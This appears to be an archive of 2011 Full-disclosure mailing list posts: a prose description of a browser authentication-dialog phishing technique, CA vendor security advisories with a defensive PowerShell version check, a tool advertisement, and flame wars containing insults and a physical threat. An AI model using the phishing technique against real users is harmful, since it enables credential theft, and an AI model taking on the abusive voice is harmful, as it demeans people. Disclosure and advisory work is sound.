for the exclusive use of addressee and may contain proprietary, confidential
and/or privileged information. If you are not the intended recipient, any
use, copying, disclosure, dissemination or distribution is strictly
prohibited. If you are not the intended recipient, please notify the sender
immediately by return e-mail, delete this communication and destroy all
copies.

On Fri, Jul 22, 2011 at 4:15 PM, Chris Truncer <
ctrun...@christophertruncer.com> wrote:

> Just ignore Mustlive. The rest of the list does.
>
>
>
> On Jul 22, 2011, at 4:08 PM, Chris Evans  wrote:
>
> > On Fri, Jul 22, 2011 at 8:36 AM, MustLive 
> wrote:
> >> Hello list!
> >>
> >> I want to warn you about URL Spoofing vulnerability in Mozilla Firefox,
> >> Internet Explorer, Google Chrome, Opera and other browsers. I found it
> long
> >> time ago, at 6th of February 2008, just after finding of built-in CSRF
> >> vulnerability in Mozilla and Firefox (it's funky CSRF attack via
> prefetching
> >> functionality), which I described at my site in March.
> >>
> >> -
> >> Affected products:
> >> -
> >>
> >> Vulnerable are all browsers which support Basic/Digest Authentication.
> It's
> >> all modern browsers and many from old browsers. In particular affected
> are
> >> Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, Firefox 4.0b2 (and Mozilla and
> all
> >> other Gecko-based browsers), Internet Explorer 6, 7, 8, Google Chrome
> >> 1.0.154.48 and Opera 10.62 and previous and next versions of these
> browsers.
> >> And other browsers which support Basic/Digest Authentication.
> >>
> >> In March, after my informing, Mozilla opened Bug 647010 in Bugzilla
> >> (https://bugzilla.mozilla.org/show_bug.cgi?id=647010).
> >>
> >> Among four browsers developers informed by me only Mozilla said, that
> they
> >> are planning to fix this vulnerability (without specifying the time).
> Google
> >> even didn't answer me, but in June they informed in their blog
> >> (
> http://blog.chromium.org/2011/06/new-chromium-security-features-june.html
> ),
> >> that they fixed this vulnerability in browsers Chrome 13 (it's now beta
> >> version) and higher.
> >>
> >> --
> >> Details:
> >> --
> >>
> >> This is better to call attack, then vulnerability, because it's using
> >> built-in browsers functionality (and its intended behavior) to attack
> users
> >> of web sites. This attack allows to conduct phishing attacks on users of
> web
> >> sites - in this case phishing is doing not at other (phishing) sites,
> not
> >> with using of holes of target sites (like reflected XSS or persistent
> XSS),
> >> but with using of browsers functionality (and allowed functionality of
> >> target sites to place external content).
> >>
> >> I called this attack as Onsite phishing (or Inline phishing). It can be
> used
> >> (including by phishers) for stealing of logins and passwords of users of
> web
> >> sites.
> >>
> >> As I've tested, a lot of different methods (with using of tags and CSS),
> >> which allow to make cross-site requests, can be used to conduct this
> attack.
> >> Except prefetching (in all Gecko-based browsers which support
> prefetching
> >> functionality), which doesn't show Authentication window at receiving of
> 401
> >> response from web server. The next methods can be used:
> >>
> >> Tags img, script, iframe, frame, embed, link (css) - Mozilla, Firefox,
> IE,
> >> Google Chrome and Opera.
> >> Tag object - Internet Explorer, Google Chrome and Opera.
> >> CSS (inline, in html files, in external css files): such
> >> as -moz-binding:url - Mozilla and Firefox < 3.0, such as
> >> background-image:url - in all browsers.
> >>
> >> Here are screenshots of the attack in different browsers (in Firefox
> 3.0.19,
> >> 3.5.x, 3.6.x. 4.0b2 the dialog window looks almost equally):
> >>
> >> http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Mozilla.png
> >> http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Firefox.png
> >> http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE6.png

Re: [Full-disclosure] Encrypted files and the 5th amendment

2011-07-12 Thread james
The police are on their way

--Original Message--
From: Abdelkader Boudih
Sender: full-disclosure-boun...@lists.grok.org.uk
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Encrypted files and the 5th amendment
Sent: 12 Jul 2011 19:40

Why must everybody care about the American Constitution? As far as I 
know this applies to its citizens only and the rest of the world is not 
protected! I don't understand why we all should respect it while the USA 
never respects the other constitutions! If I decide to encrypt my data 
and forget the password, how could they force me to decrypt it? I 
recently found a 234 MB encrypted TrueCrypt file on my HD; I don't even 
remember what and when I created it and which keyfile I used!






Sent from my BlackBerry® wireless device


Re: [Full-disclosure] Encrypted files and the 5th amendment

2011-07-12 Thread James Rankin
That is true in the UK. See

http://www.pcpro.co.uk/news/361693/teenager-jailed-for-refusing-to-reveal-encryption-keys


On 12 July 2011 17:52, Thor (Hammer of God)  wrote:

>  I’m sure many of us will be following this closely:
>
> http://news.cnet.com/8301-31921_3-20078312-281/doj-we-can-force-you-to-decrypt-that-laptop/
>
> I understand that in the UK, one can be prosecuted for not turning over
> actual encryption keys to .gov -  Is that correct?
>
> T
>
> There’s no reason to think “outside the box”
> if you don’t think yourself into it.
>
> Order “Thor’s Microsoft Security Bible”
>
> Timothy Thor Mullen
> http://www.hammerofgod.com
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."


Re: [Full-disclosure] You a trollin'

2011-07-04 Thread James Matthews
Yes you are trolling...

On Mon, Jul 4, 2011 at 12:27 PM, t0hitsugu  wrote:

> Am I right? ;D
>
>



-- 
http://www.theboxery.com


Re: [Full-disclosure] NiX API

2011-06-09 Thread James Rankin
>> It definitely does something

Well, what?

Re: [Full-disclosure] CA20110420-02: Security Notice for CA Output Management Web Viewer

2011-05-19 Thread Williams, James K
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110420-01: Security Notice for CA SiteMinder


Issued:  April 20, 2011
Updated:  May 19, 2011


CA Technologies support is alerting customers to a security risk 
associated with CA SiteMinder. A vulnerability exists that can allow a 
malicious user to impersonate another user.  CA Technologies has 
issued patches to address the vulnerability.

The vulnerability, CVE-2011-1718, is due to improper handling of 
multi-line headers. A malicious user can send specially crafted data 
to impersonate another user.


Risk Rating 

Medium


Platform 

Windows


Affected Products 

CA SiteMinder R6 IIS 6.0 Web Agents prior to R6 SP6 CR2
CA SiteMinder R12 IIS 6.0 Web Agents prior to R12 SP3 CR2


How to determine if the installation is affected 

Check the Web Agent log to obtain the installed release version. Note 
that the "webagent.log" file name is configurable by the SiteMinder 
administrator.


Solution

CA has issued patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR2 or later

CA SiteMinder R12: 
Upgrade to R12 SP3 CR2 or later

CR releases can be found on the CA SiteMinder Hotfix / Cumulative 
Release page:
(URL may wrap)
support.ca.com/irj/portal/anonymous/phpdocs?filePath=0/5262/5262_fixindex.html


References

CVE-2011-1718 - CA SiteMinder Multi-line Header Vulnerability


Acknowledgement

April King (ap...@twoevils.org)


Change History

Version 1.0: Initial Release
Version 1.1: Updated Affected Products section to clarify that only 
 the IIS 6.0 Web Agents are affected.  IIS 7 is not 
 affected by this issue.


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782




Re: [Full-disclosure] Sony: No firewall and no patches

2011-05-11 Thread James Matthews
Most security certifications are a mockery of entire industry.

On Mon, May 9, 2011 at 7:33 PM, Ivan .  wrote:

> I guess that makes a mockery of the PCI DSS framework!
>
> On Tue, May 10, 2011 at 9:03 AM, Thor (Hammer of God) <
> t...@hammerofgod.com> wrote:
>
>>  Maybe they should call that "You don't have to patch" genius!  Lol
>>
>>
>> http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/
>>
>>
>> Sent from my Windows Phone
>>
>>
>
>
>



-- 
http://www.goldwatches.com


Re: [Full-disclosure] Barracuda backdoor

2011-04-28 Thread James Lay

On 4/28/11 4:09 AM, "Tõnu Samuel"  wrote:

>
>admin interface of product. Even more irritating was fact that admin
>wanted to see why some e-mails were lost and was denied even to see logs!
>


Heh...yank the drive and mount it in a linux box...it's just Mandrake
linux anyways (most likely going against GPL since they are using ClamAV
and SpamAssassin).

J




[Full-disclosure] CA20110420-01: Security Notice for CA SiteMinder

2011-04-20 Thread Williams, James K
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110420-01: Security Notice for CA SiteMinder


Issued:  April 20, 2011


CA Technologies support is alerting customers to a security risk 
associated with CA SiteMinder. A vulnerability exists that can allow a 
malicious user to impersonate another user.  CA Technologies has 
issued patches to address the vulnerability.

The vulnerability, CVE-2011-1718, is due to improper handling of 
multi-line headers. A malicious user can send specially crafted data 
to impersonate another user.


Risk Rating 

Medium


Platform 

Windows


Affected Products 

CA SiteMinder R6 Web Agents prior to R6 SP6 CR2
CA SiteMinder R12 Web Agents prior to R12 SP3 CR2


How to determine if the installation is affected 

Check the Web Agent log to obtain the installed release version. Note 
that the "webagent.log" file name is configurable by the SiteMinder 
administrator.


Solution

CA has issued patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR2 or later

CA SiteMinder R12: 
Upgrade to R12 SP3 CR2 or later

CR releases can be found on the CA SiteMinder Hotfix / Cumulative 
Release page:
(URL may wrap)
support.ca.com/irj/portal/anonymous/phpdocs?filePath=0/5262/5262_fixindex.html


References

CVE-2011-1718 - CA SiteMinder Multi-line Header Vulnerability


Acknowledgement

April King (ap...@twoevils.org)


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782




[Full-disclosure] CA20110420-02: Security Notice for CA Output Management Web Viewer

2011-04-20 Thread Williams, James K
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110420-02: Security Notice for CA Output Management Web Viewer


Issued:  April 20, 2011


CA Technologies support is alerting customers to security risks 
associated with CA Output Management Web Viewer. Two vulnerabilities 
exist that can allow a remote attacker to execute arbitrary code.  CA 
Technologies has issued patches to address the vulnerabilities.

The vulnerabilities, CVE-2011-1719, are due to boundary errors in the 
UOMWV_HelperActiveX.ocx and PPSView.ocx ActiveX controls. A remote 
attacker can create a specially crafted web page to exploit the flaws 
and potentially execute arbitrary code.


Risk Rating 

High


Platform 

Windows


Affected Products 

CA Output Management Web Viewer 11.0 
CA Output Management Web Viewer 11.5


How to determine if the installation is affected 

If the end-user controls are at a version that is less than the 
versions listed below, the installation is vulnerable.


File Name Version 

UOMWV_HelperActiveX.ocx   11.5.0.1 
PPSView.ocx   1.0.0.7


Solution

CA has issued the following patches to address the vulnerability.

CA Output Management Web Viewer 11.0:
Apply the RO29119 APAR, and then have end-users allow updated controls 
to be installed (on next attempt to use impacted feature).

CA Output Management Web Viewer 11.5:
Apply the RO29120 APAR, and then have end-users allow updated controls 
to be installed (on next attempt to use impacted feature).


References

CVE-2011-1719 - CA Output Management Web Viewer ActiveX Control Buffer 
Overflows


Acknowledgement

Dmitriy Pletnev, Secunia Research


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com




[Full-disclosure] Hacking The Trading Floor Talk code wanted

2011-04-14 Thread James Kerry
Hi,

I am desperately trying to access the code for this talk. Can someone
please advise where I could possibly find this info?

http://www.slideshare.net/iffybird_099/hacking-the-trading-floor-7613988


Kind Regards,

J Kerry
MSc, CCIE, CCNA
Rapport Capital Technologies

[Full-disclosure] CA20110223-01: Security Notice for CA Host-Based Intrusion Prevention System

2011-02-24 Thread Williams, James K

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20110223-01: Security Notice for CA Host-Based Intrusion Prevention 
System

Issued: February 23, 2011
Updated: February 24, 2011


CA Technologies support is alerting customers to a security risk 
associated with CA Host-Based Intrusion Prevention System (HIPS). A 
vulnerability exists that can allow a remote attacker to execute 
arbitrary code.  CA Technologies has issued patches to address the 
vulnerability.

The vulnerability, CVE-2011-1036, is due to insecure method 
implementation in the XMLSecDB ActiveX control that is utilized in CA 
HIPS components and products. A remote attacker can potentially execute 
arbitrary code if he can trick a user into visiting a malicious web 
page or opening a malicious file.


Risk Rating 
Medium


Platform 
Windows


Affected Products 
CA Host-Based Intrusion Prevention System (HIPS) r8.1
CA Internet Security Suite (ISS) 2010
CA Internet Security Suite (ISS) 2011


How to determine if the installation is affected 
HIPS Management Server is vulnerable if the version number is less than 
8.1.0.88.

HIPS client sources are vulnerable if the build number is less than 
1.6.450.

CA Internet Security Suite (ISS) 2010 is vulnerable if the ISS product 
version is equal to or less than 6.0.0.285 and the HIPS version is 
equal to or less than 1.6.384.

CA Internet Security Suite (ISS) 2011 is vulnerable if the ISS product 
version is equal to or less than 7.0.0.115 and the HIPS version is 
equal to or less than 1.6.418.

Older versions of HIPS and ISS, that are no longer supported, may also 
be vulnerable.


Solution

CA has issued the following patches to address the vulnerability.

CA Host-Based Intrusion Prevention System (HIPS) r8.1:
RO26950
Apply RO26950 and set the DWORD "ProtectParser" under 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UmxCfg to "1". You 
do not need to restart the client.

CA Internet Security Suite (ISS) 2010:
Fix information will be published soon.

CA Internet Security Suite (ISS) 2011:
Fix information will be published soon.


References

CVE-2011-1036 - CA HIPS XMLSecDB ActiveX control insecure methods


Acknowledgement

Andrea Micalizzi aka rgod, via TippingPoint ZDI


Change History

Version 1.0: Initial Release
Version 1.5: Added ISS 2011 to list of affected products. Added 
instructions for determining if ISS is affected.


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com.

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com



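As an added example (not CA's own tooling), here is a read-only PowerShell check covering the "How to determine if the installation is affected" steps of the CA Output Management Web Viewer notice (CA20110420-02, ActiveX control versions) and the CA HIPS notice (CA20110223-01, the ProtectParser registry value) above. The file names, version thresholds and registry key are those the advisories state; the directory the OCX controls are read from is an assumption and must be set per host.

```powershell
# Added example, not CA's tooling: a read-only check for the "How to determine
# if the installation is affected" guidance in CA20110420-02 (ActiveX control
# versions) and CA20110223-01 (HIPS ProtectParser registry value).
# Version thresholds and the registry path come from the advisories; the
# OCX install directory below is an assumption and must be set per host.

function Test-MinimumFileVersion {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Minimum
    )
    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Installed = $null; Minimum = $Minimum; Status = 'NotPresent' }
    }
    $vi = (Get-Item -LiteralPath $Path).VersionInfo
    # Build a System.Version from the numeric parts rather than comparing the
    # FileVersion string: "9.0.0.1" sorts after "11.5.0.1" as text but is
    # older numerically, which is exactly the comparison the advisory needs.
    $installed = New-Object System.Version($vi.FileMajorPart, $vi.FileMinorPart,
                                           $vi.FileBuildPart, $vi.FilePrivatePart)
    $status = if ($installed -lt [version]$Minimum) { 'Vulnerable' } else { 'Fixed' }
    [pscustomobject]@{ Path = $Path; Installed = $installed; Minimum = $Minimum; Status = $status }
}

function Test-HipsProtectParser {
    # CA20110223-01: after RO26950 the DWORD ProtectParser under UmxCfg must be 1.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\UmxCfg'
    if (-not (Test-Path -LiteralPath $key)) { return 'UmxCfgServiceNotPresent' }
    $item = Get-ItemProperty -LiteralPath $key -Name ProtectParser -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'ProtectParserNotSet' }
    if ($item.ProtectParser -eq 1) { 'Mitigated' } else { 'NotMitigated' }
}

# Assumed location: Internet Explorer keeps downloaded ActiveX controls under
# Downloaded Program Files; adjust if the controls were deployed elsewhere.
$ocxDir = Join-Path $env:SystemRoot 'Downloaded Program Files'
$controls = @(
    @{ Path = (Join-Path $ocxDir 'UOMWV_HelperActiveX.ocx'); Minimum = '11.5.0.1' },
    @{ Path = (Join-Path $ocxDir 'PPSView.ocx');            Minimum = '1.0.0.7' }
)
$controls | ForEach-Object { Test-MinimumFileVersion @_ } | Format-Table -AutoSize
"HIPS ProtectParser: $(Test-HipsProtectParser)"
```

The registry check only tells you whether the mitigation setting is in place; the advisory's version thresholds for the HIPS server and client builds still have to be compared the same way as the OCX versions above.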

Re: [Full-disclosure] New tool for penetration testing!!!

2011-02-21 Thread James Lay
From:  runlvl 
Date:  Mon, 21 Feb 2011 02:57:58 -0300
To:  Full-disclosure 
Subject:  [Full-disclosure] New tool for penetration testing!!!

Insecurity Research is happy to announce the release of version 2.0,
get it now while it is still hot !

Insect Pro 2.0 is a penetration security auditing and testing software
solution designed to allow organizations of all sizes mitigate,
monitor and manage the latest security threats vulnerabilities.

We're always working to improve Insect Pro and now the users obtain
all the metasploit functionalities plus all the Insect Pro modules
merge all in a unique application.

We invite you to take a visual tour where you can find screen shots and
videos, visit us at http://www.insecurityresearch.com


We are really thankful with the community, thanks for all your support
that keep us coding!

There is no fixed price to get it, you can obtain the full version
with updates from $20 !

Get it now from: http://www.insecurityresearch.com





This is really starting to look like spam...




Re: [Full-disclosure] (this thread is now about porn).‏

2011-02-17 Thread Rankin, James R
Sue me. Dickhead. My contribution here is over. Don't forget about the train.

Bye,

Typed frustratingly slowly on my BlackBerry® wireless device

-Original Message-
From: "andrew.wallace" 
Date: Thu, 17 Feb 2011 14:49:46 
To: valdis.kletni...@vt.edu; 
kz2...@googlemail.com
Reply-To: "andrew.wallace" 
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (this thread is now about porn).

On Thu, Feb 17, 2011 at 10:04 PM,   wrote:
> You *do* realize we have very little proof that the entity posting
> as Cal isn't a sock puppet of Andrew's creation, to further his vendetta
> against full disclosure because it helps the cyber-terrorists?  It's the
> sort of thing that one of England's top cyber-security experts would do,
> isn't it? :)

On Thu, Feb 17, 2011 at 10:10 PM, Rankin, James R  wrote:
> I am an alter ego of netty's that he has invented to argue with in case the 
> voices in his head stop talking about national security

The right to free expression can be restricted if this is necessary to protect 
the reputation of others. The law of defamation allows persons who consider 
that their reputation has been or may be harmed by statements made by others to 
sue for damages or to prevent the making of those statements. 
http://www.yourrights.org.uk/yourrights/right-of-free-expression/defamation/index.html

You're treading on very thin ice.

Andrew





Re: [Full-disclosure] (this thread is now about porn) .‏

2011-02-17 Thread Rankin, James R
I am an alter ego of netty's that he has invented to argue with in case the 
voices in his head stop talking about national security

Typed frustratingly slowly on my BlackBerry® wireless device

-Original Message-
From: valdis.kletni...@vt.edu
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Thu, 17 Feb 2011 17:04:25 
To: phocean<0...@phocean.net>
Cc: full-disclosure@lists.grok.org.uk; 
andrew.wallace
Subject: Re: [Full-disclosure] (this thread is now about porn) .



Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread Rankin, James R
That is so rich coming from you. I am not even gonna bother digging up your old 
posts.

Typed frustratingly slowly on my BlackBerry® wireless device

-Original Message-
From: "andrew.wallace" 
Date: Thu, 17 Feb 2011 09:28:42 
To: Cal Leeming \[Simplicity Media Ltd\]
Reply-To: "andrew.wallace" 
Cc: kz2...@googlemail.com; ot48...@gmail.com; 
full-disclosure@lists.grok.org.uk; datski...@gmail.com; 
bka...@ford.com; Paul Schmehl
Subject: Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown

On Thu, Feb 17, 2011 at 4:27 PM, Paul Schmehl  wrote:
> Does anyone on this list really give a crap that you guys like publicly
> pulling your puds?
>
> At some point in life, most people grow up.

On Thu, Feb 17, 2011 at 4:57 PM, Cal Leeming [Simplicity Media Ltd] 
 wrote:

> I disagree. Unless you are the bitch who hands out the tea and biscuits.

Like Paul said, you have a lot of growing up to do, that's why people want you 
off the list.

Andrew





Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread James Rankin
Do you know what the Atlas project is?

On 17 February 2011 16:26, andrew.wallace wrote:

> On Thu, Feb 17, 2011 at 4:11 PM, James Rankin 
> wrote:
> > I don't want to be invited for cross-dressing talks with you, you
> delusional
> > moron
> >
> > Get back down the pub.
> >
> > A long way to go? I make good money from my career, matey. (Career. Ever
> > heard of one?) You on the other hand are firmly wedged in cloud-cuckoo. I
> > work for the government at the minute, and no-one here has ever heard of
> > you.
> >
> > Goodnight.
>
> Perhaps you work for a local government authority, however you aren't
> involved with any central government organisation in Cheltenham or London.
>
> The way you talk to people, you are unlikely to be involved in anything
> meaningful within the government, perhaps a local authority though.
>
> Andrew
>
>


-- 
*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have any legal or no
grammatical use and may be ignored. No animals were harmed in the
transmission of this email, although the kelpie next door is living on
borrowed time, let me tell you. Those of you with an overwhelming fear of
the unknown will be gratified to learn that there is no hidden message
revealed by reading this warning backwards, so just ignore that Alert Notice
from Microsoft.

However, by pouring a complete circle of salt around yourself and your
computer you can ensure that no harm befalls you and your pets. If you have
received this email in error, please add some nutmeg and egg whites, whisk
and place in a warm oven for 40 minutes.*

Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread James Rankin
I don't want to be invited for cross-dressing talks with you, you delusional
moron

Get back down the pub.

A long way to go? I make good money from my career, matey. (Career. Ever
heard of one?) You on the other hand are firmly wedged in cloud-cuckoo. I
work for the government at the minute, and no-one here has ever heard of
you.

Goodnight.

On 17 February 2011 14:50, andrew.wallace wrote:

> On Thu, Feb 17, 2011 at 2:20 PM, James Rankin 
> wrote:
> > No-one in the UK or UK security community has heard of Nettie or his
> > consultancy.
> >
> > He's just a deluded Jocko pisspot
>
> I've been a member for the last 12 years and frequent industry conferences
> regularly, as well as chair roundtable discussions between the sectors. I
> doubt you've ever been involved in any of that, because speaking to me in
> the manner you are, you are unlikely to be invited for cross-industry talks
> with anyone.
>
> Learn to respect others and get on with people instead of posting abusive
> messages to mailing lists, and you may get invited into talks between the
> government and the private sector.
>
> Judging by your email though it seems you have a long way to go.
>
> Andrew
>
>



Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown‏

2011-02-17 Thread James Rankin
No-one in the UK or UK security community has heard of Nettie or his
consultancy.

He's just a deluded Jocko pisspot

On 17 February 2011 14:01, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> I refer everyone to:
>
>
> http://docs.google.com/viewer?a=v&q=cache:OWQrHOa0wlYJ:www.hackerfactor.com/papers/who_is_n3td3v.pdf+n3td3v&hl=en&gl=uk&pid=bl&srcid=ADGEESgOXeElYqoYkhojj9qtZ3bPDRiy_2OMLyhlaOqW6If-yK4-eLXAZQ4Yw3TGMl0YQFIwSmB0QbQmAjsnuZf8lmGMdXQrKwsWd8CtM7iO6xc4zSs621RgeFXvg-ueRsE5R1D5ENGv&sig=AHIEtbQlx0J-_J8eIS6lzxmFJJ0nQz23iw
>
>
> On Thu, Feb 17, 2011 at 1:51 PM, andrew.wallace <
> andrew.wall...@rocketmail.com> wrote:
>
>> On Wed, Feb 16, 2011 at 5:54 PM, Old Timer  wrote:
>> > andrew:
>> >
>> > "Cal is a blackhat with criminal convictions, I hope he is forced from
>> the
>> > list by an uprising of whitehats.
>> >
>> > I'm a whitehat and its upsetting to see the disclosure community being
>> taken
>> > over by criminals.
>> >
>> > Andrew"
>> >
>> >
>> > hahahah
>> >
>> > Why don't you have a quick glance at the list charter and see who
>> founded
>> > this list ?  Then go look them up in wikipedia
>> >
>> > While yer at it, check out Scott Chasin, who founded bugtraq...
>> >
>> > And 8lgm, who were prolific bugtraq posters...
>> >
>> > the list goes on and on (and on and on).  How old are you, son ?
>>
>> n3td3v - Brief history of the consortium and timeline
>>
>> How We Started
>>
>> * Founded by entrepreneur and IT Security Consultant, Andrew Wallace.
>>
>> * The aged 30-something year old was born in 1981 and started the
>> consultancy at the young age of 18.
>>
>> * n3td3v - IT Security Consultancy was founded in 1999 and helped the
>> entrepreneur launch his career in IT Security.
>>
>> * Today, 2011, we are one of the most well known non-profit IT Security
>> consortia in the UK.
>>
>> Learn more: https://sites.google.com/site/n3td3v/
>>
>> Andrew
>>
>>
>>
>>
>>
>
>




Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread James Rankin
Nettie (and that isn't a term of endearment - see
http://en.wiktionary.org/wiki/nettie)

Please bog off. You make me ashamed to be British. Anyone with a burgeoning
consultancy would shut the hell up about it, not bawl about it on FD.

I have to say that your trolling is first-class though. I am an FD lurker,
not a contributor, yet you have wound me up enough to respond. For that,
well done.

Now sod off. I am only a short train ride from your neck of the woods, and I
would love to kick your ass for plaguing my inbox again.

Adios,

On 10 February 2011 16:32, andrew.wallace wrote:

> Thankfully you are very rarely involved with public and private sector
> business talks in the UK, so the situation will probably never arise we are
> in the same board room.
>
> Stay in America and keep away from the UK is the best thing that could ever
> happen to you, because frankly meeting you would be a complete nightmare for
> me and I would find it hard to work with you on any meaningful level.
>
> One thing for sure is you have pissed me off with the way you speak to me
> via private email and your perceived perception of who I am, and what you
> think n3td3v is.
>
> Maybe in the beginning it seemed like disorganised non-sense to you, but it
> has evolved and shaped over the years with me and is now a serious force to
> be reckoned with and is able to compete with other consultancy orgainsations
> in the UK, now that there are serious consultants on board from the business
> and government sector in the UK, where we work on meaningful policy reform
> within organisations, to tighten security against foreign powers, terrorist
> attacks and other matters.
>
> To be perfectly honest, I would like to say, I think you've been reading
> mailing lists too much, a lot more goes on in industry than the stupid
> disclosure community, work actually gets done that is meaningful and
> satisfying when I come home at night.
>
> My advice to you is, stop reading mailing lists, get on with the physical
> industry and stop basing your views of people based on back and forward
> horse play people have have had between 2004-2009.
>
> That part of n3td3v is behind you, me and everyone, I removed the mailing
> list as a symbolic gesture to move on from that.
>
> I'm now a professional, consulting and liaising with other consultants in
> the UK in the public and private sector through the consortium, the
> consultants who ive had dealings with in the physical domain who have
> decided to join through knowing me in a working relationship.
>
> The organisation is nothing to do with what it might have been, n3td3v is
> rethought and matured, along with me.
>
> You couldn't possibly say the same orgainsation I started when I was 18 is
> going to be the same orgainsation today now that I'm 30, it isn't.
>
> I've changed, we've changed, the type of people I come into contact has
> changed through opportunities I've gained in the physical domain.
>
> n3td3v is very much nothing to do with anything online-based, but has
> shifted into the physical domain, in that, its people I actually know who I
> can shake hands with who are members.
>
> That is why the name was changed, the brand, its now a consortium, its
> nothing to do with online or some silly Google group mailing list.
>
> The beginning days of n3td3v between 2004-2009 and the Google group mailing
> list was used to pushed my name out into the industry to become known, you
> should be able to work with me in a meaningful working relationship if you
> ever had to through work commitments.
>
> Everyone else who I meet in the physical domain knows who I am, but they
> don't judge me for it, they shake my hand and move on with the problems in
> the industry that are needing solved.
>
> They don't say, that's Andrew who used to post in the disclosure community,
> let's huff and puff about it.
>
> They take me as I am in the physical domain, realise it was silly horse
> play from the past and move on.
>
> I hope you are able to do the same, because your attitude just annoys me
> that you cannot have a mature and professional approach in the way you talk
> with me.
>
> Andrew
>
>



Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

2011-02-10 Thread James Rankin
The guy is a feeble Jock troll who obviously thought this whole "National
Security" thing would get him laid.

I have to admit grudging admiration for his tenacity in that he is still
trying to make it work. Determination alone, though, does not an infosec
professional make.

On 10 February 2011 15:22,  wrote:

> On Thu, 10 Feb 2011 14:49:15 +0100, Christian Sciberras said:
> > Why didn't we all think about it in the first place!
> > A conspiracy, so OBVIOUS!!
>
> > On Thu, Feb 10, 2011 at 7:38 AM, andrew.wallace <
> > andrew.wall...@rocketmail.com> wrote:
> > > It is obvious they don't want people like me and my organisation who
> deal
> > > in national security on the list, that is why the moderation was
> > > implemented.
>
> Yep, some huge shadowy "national security organization" that nobody but the
> leader admits being a part of, it must be a conspiracy.  I wonder who out
> there
> is a sleeper agent.  Consider Gadi Evron, Marcus Sachs, and myself -
> Andrew's
> done so much to distance himself from all three of us that we must all be
> sleeper agents.  Think about that.. and who *else* might be part of the
> conspiracy.  It could go deeper than even Andrew realizes...
>
>




[Full-disclosure] CA20101231-01: Security Notice for CA ARCserve D2D (updated)

2011-01-27 Thread Williams, James K

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20101231-01: Security Notice for CA ARCserve D2D

Issued: December 31, 2010
Last Updated: January 26, 2011

CA Technologies support is alerting customers to a security risk with 
CA ARCserve D2D. A vulnerability exists that can allow a remote 
attacker to execute arbitrary code.  CA has issued an Information 
Solution to address the vulnerability.

The vulnerability is due to weaknesses in the default configuration of 
the third-party Tomcat and Axis2 software components bundled with the 
product. A remote attacker can exploit the implementation to execute 
arbitrary code.


Risk Rating 

High


Platform 

Windows


Affected Products 

CA ARCserve D2D r15


How to determine if the installation is affected 

Using Windows Explorer, go to the directory 
"\TOMCAT\webapps\WebServiceImpl", and look for the existence 
of a folder called "axis2-web".


Solution

CA has issued the following patch to address the vulnerability.

CA ARCserve D2D r15:
RO26040

If you are not able to apply the patch at this time, the following 
workaround can be implemented to address the vulnerability.

1.  Stop "CA ARCserve D2D Web Service" from service control manager.

2.  Go to the directory "\TOMCAT\webapps\WebServiceImpl", 
and remove the folder "axis2-web".

